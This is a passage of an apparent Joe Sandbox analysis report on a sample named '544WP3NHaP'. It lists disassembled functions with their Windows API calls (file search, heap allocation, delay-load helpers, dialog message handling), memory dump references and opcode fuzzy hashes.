                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: e2ba92658a5fa4ca9f0a89e6eb4fb6418c705b2d711dd43d6e01c286250d8c16
                                                                                                                                  • Instruction ID: f058163cd401d39990c7d892daa6c8d82c388c349debf7063553ec3ec84b6d27
                                                                                                                                  • Opcode Fuzzy Hash: e2ba92658a5fa4ca9f0a89e6eb4fb6418c705b2d711dd43d6e01c286250d8c16
                                                                                                                                  • Instruction Fuzzy Hash: 9A016933D00528ABDF11ABACCD81ADEB775FF8A750F014525F856F7A51DA348D04C6A1
                                                                                                                                  Function 008C3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 008C3C3F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190572456-0
                                                                                                                                  • Opcode ID: 73f23f2f9ce11a6ec529c18d65eea70808ec186fc3047a53a169c5f919814944
                                                                                                                                  • Instruction ID: b8fbc40b7263dd7a394eeea8b860bed571ebc2c26b2ab956789ff8d256d6f475
                                                                                                                                  • Opcode Fuzzy Hash: 73f23f2f9ce11a6ec529c18d65eea70808ec186fc3047a53a169c5f919814944
                                                                                                                                  • Instruction Fuzzy Hash: 39F08C3620421A9FCF128EA8EC04E9E77B9FB11B207148129FA15E6190DB31DA21E7A0
                                                                                                                                  Function 008C8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 181e6c1eda61f048e1dfcf676c3bc4036975a3fb6b1d9f12977ef87241632aa0
                                                                                                                                  • Instruction ID: 0826b5d5a6a12bb1c2897b4ecedaacd18e59d364337b9cd723eff02c5f8dc158
                                                                                                                                  • Opcode Fuzzy Hash: 181e6c1eda61f048e1dfcf676c3bc4036975a3fb6b1d9f12977ef87241632aa0
                                                                                                                                  • Instruction Fuzzy Hash: A6E06531686125D6DBB127659C09F9B7678FB817B4F150159BC58D6091CF31CC0191E2
                                                                                                                                  Function 008A5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A5AC2
                                                                                                                                    • Part of subcall function 008AB505: __EH_prolog.LIBCMT ref: 008AB50A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: f983906726a6992bbe6270c79437435f04b40bb528566ce7cf6c9de24b339ae9
                                                                                                                                  • Instruction ID: b59e8fd0e852dd078d26d95386730127e6dfc65f0ba9ada2133b23dffeb6a3ef
                                                                                                                                  • Opcode Fuzzy Hash: f983906726a6992bbe6270c79437435f04b40bb528566ce7cf6c9de24b339ae9
                                                                                                                                  • Instruction Fuzzy Hash: 72016930850790DAD729E7ACC0417DEBBB4EF66304F50848EA456A3382CBB41B08DAA3
                                                                                                                                  Function 008AA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008AA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6C4
                                                                                                                                    • Part of subcall function 008AA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6F2
                                                                                                                                    • Part of subcall function 008AA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6FE
                                                                                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008AA598
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1464966427-0
                                                                                                                                  • Opcode ID: 1686d6205044038afbcc183188f73f2d45de3f882140426a6e56e9d33a02c41a
                                                                                                                                  • Instruction ID: 3208879b68a1a510dd66e7d6bce3284757e50ebeb67e152d4aa6e0d6905fca51
                                                                                                                                  • Opcode Fuzzy Hash: 1686d6205044038afbcc183188f73f2d45de3f882140426a6e56e9d33a02c41a
                                                                                                                                  • Instruction Fuzzy Hash: 5DF08931409790ABDB665BF849047C77B90BF1B331F048A49F1FD92996C3755494DB23
                                                                                                                                  Function 008B0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 008B0E3D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecutionStateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2211380416-0
                                                                                                                                  • Opcode ID: dff253be91833e2387314224d67c16aad51d77c8e596da9f983fd81c1dc5c8e1
                                                                                                                                  • Instruction ID: e2aa2d32f2404802a390c7fda7ee8b66ff559a13ccb28b82190faf25956e2396
                                                                                                                                  • Opcode Fuzzy Hash: dff253be91833e2387314224d67c16aad51d77c8e596da9f983fd81c1dc5c8e1
                                                                                                                                  • Instruction Fuzzy Hash: BCD0122160109556EF11732D686D7FF2606FFC7331F0D0066B145DB786DE548886A263
                                                                                                                                  Function 008BA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 008BA62C
                                                                                                                                    • Part of subcall function 008BA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008BA3DA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1915507550-0
                                                                                                                                  • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                  • Instruction ID: 7c2f141a57137bcbe83dcf6f9a977293051b4287ac52d52731214921c3c56857
                                                                                                                                  • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                  • Instruction Fuzzy Hash: F5D0C9B121020EBADF4A6B65CC129EE7A99FB11754F048125B842E5392EFB1D910A663
                                                                                                                                  Function 008BE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DloadProtectSection.DELAYIMP ref: 008BE5E3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DloadProtectSection
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2203082970-0
                                                                                                                                  • Opcode ID: 94f34a9198c41c0fcc722574ca9ee44783463ee6b845a9ef299469d2c5e03133
                                                                                                                                  • Instruction ID: 441396f84bc74f77e522ba328db946210b4032a045f057965fcdb42b370c9443
                                                                                                                                  • Opcode Fuzzy Hash: 94f34a9198c41c0fcc722574ca9ee44783463ee6b845a9ef299469d2c5e03133
                                                                                                                                  • Instruction Fuzzy Hash: E0D012B01D4260DFE712EFACA847BD433D4F734709F900112F199D1795DB64C481D616
                                                                                                                                  Function 008BDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,008B1B3E), ref: 008BDD92
                                                                                                                                    • Part of subcall function 008BB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BB579
                                                                                                                                    • Part of subcall function 008BB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB58A
                                                                                                                                    • Part of subcall function 008BB568: IsDialogMessageW.USER32(00010424,?), ref: 008BB59E
                                                                                                                                    • Part of subcall function 008BB568: TranslateMessage.USER32(?), ref: 008BB5AC
                                                                                                                                    • Part of subcall function 008BB568: DispatchMessageW.USER32(?), ref: 008BB5B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 897784432-0
                                                                                                                                  • Opcode ID: 1243a83ecc475a741f96c16eb62ad5fae9c43caf1ba2ee0a78e904b428c92af1
                                                                                                                                  • Instruction ID: 4611d737c785c168e504da17c19e262c4708a49e792e15260decf30dd867b292
                                                                                                                                  • Opcode Fuzzy Hash: 1243a83ecc475a741f96c16eb62ad5fae9c43caf1ba2ee0a78e904b428c92af1
                                                                                                                                  • Instruction Fuzzy Hash: 03D09E31148300BADA122B55DD06F4F7AA6FB88B09F004554B285740F186729D21EF16
                                                                                                                                  Function 008A98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileType.KERNELBASE(000000FF,008A97BE), ref: 008A98C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3081899298-0
                                                                                                                                  • Opcode ID: 62477f04481e25cee0df24dcbc19468a167e372dafd404b6c594a33980249395
                                                                                                                                  • Instruction ID: 6fd34993ddf465b9c8475aedef080618ff40c0e3e8565473db0d25c2a47162ed
                                                                                                                                  • Opcode Fuzzy Hash: 62477f04481e25cee0df24dcbc19468a167e372dafd404b6c594a33980249395
                                                                                                                                  • Instruction Fuzzy Hash: 17C01238408205869E208B2498480997322FE533A67B487A4C1A8C98A1C32ACC87EA01
                                                                                                                                  Function 008BE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: ff04b303f4b8ead6c575cfef20d23a1391cd83b369f097104f7c214083843463
                                                                                                                                  • Instruction ID: 7f1709027306d6b423d146e0e93058dc41ba16b8ab69d947b1a2f3830ecc922a
                                                                                                                                  • Opcode Fuzzy Hash: ff04b303f4b8ead6c575cfef20d23a1391cd83b369f097104f7c214083843463
                                                                                                                                  • Instruction Fuzzy Hash: CDB092A5258205AC211411492802CB7025DE085B11330C53AF851C06809840AC000472
                                                                                                                                  Function 008BE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 036d54387f5550da38bea35695ec6e164ae21c96a864170a096afc0bc3cba1b2
                                                                                                                                  • Instruction ID: a601b095d758dc866d3383b7f856f20f854435bcf40ea5f82487722e58782a5c
                                                                                                                                  • Opcode Fuzzy Hash: 036d54387f5550da38bea35695ec6e164ae21c96a864170a096afc0bc3cba1b2
                                                                                                                                  • Instruction Fuzzy Hash: 7EB012E525C209AC3154514D2C03CF7029DF0C8F11330C13FF815C03C0D8407C000532
                                                                                                                                  Function 008BE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 1db1b1970fb35a5b91660fba34b2c61377b2f24ec45a6a57613c79cba56d44db
                                                                                                                                  • Instruction ID: b60f02b4d7580f68df334474edd3bf65979fe76f5029cf3129339ed3cd8deff6
                                                                                                                                  • Opcode Fuzzy Hash: 1db1b1970fb35a5b91660fba34b2c61377b2f24ec45a6a57613c79cba56d44db
                                                                                                                                  • Instruction Fuzzy Hash: 5AB092A1258205AC215456092802CB6029DE085B11330C13AF815C07809840A8040472
                                                                                                                                  Function 008BE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: e47b64b815aac7f008172c806cf5cb1c9827facc26d8e79144644282996a8776
                                                                                                                                  • Instruction ID: 51779937d89a6fc5e06b727a2acce72c86cbd940501f7eb0eecec615ae2ca403
                                                                                                                                  • Opcode Fuzzy Hash: e47b64b815aac7f008172c806cf5cb1c9827facc26d8e79144644282996a8776
                                                                                                                                  • Instruction Fuzzy Hash: D8B092A1258105AC2154510A2902CB602DDE084B15330C13AF815C0380984069010432
                                                                                                                                  Function 008BE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
